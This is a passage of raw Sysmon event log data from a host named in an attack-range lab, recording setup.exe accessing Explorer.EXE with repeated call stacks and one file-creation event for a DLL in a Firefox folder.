13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-runtime-l1-1-0.dll2021-01-18 13:59:52.224 10341000x800000000000000014501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windo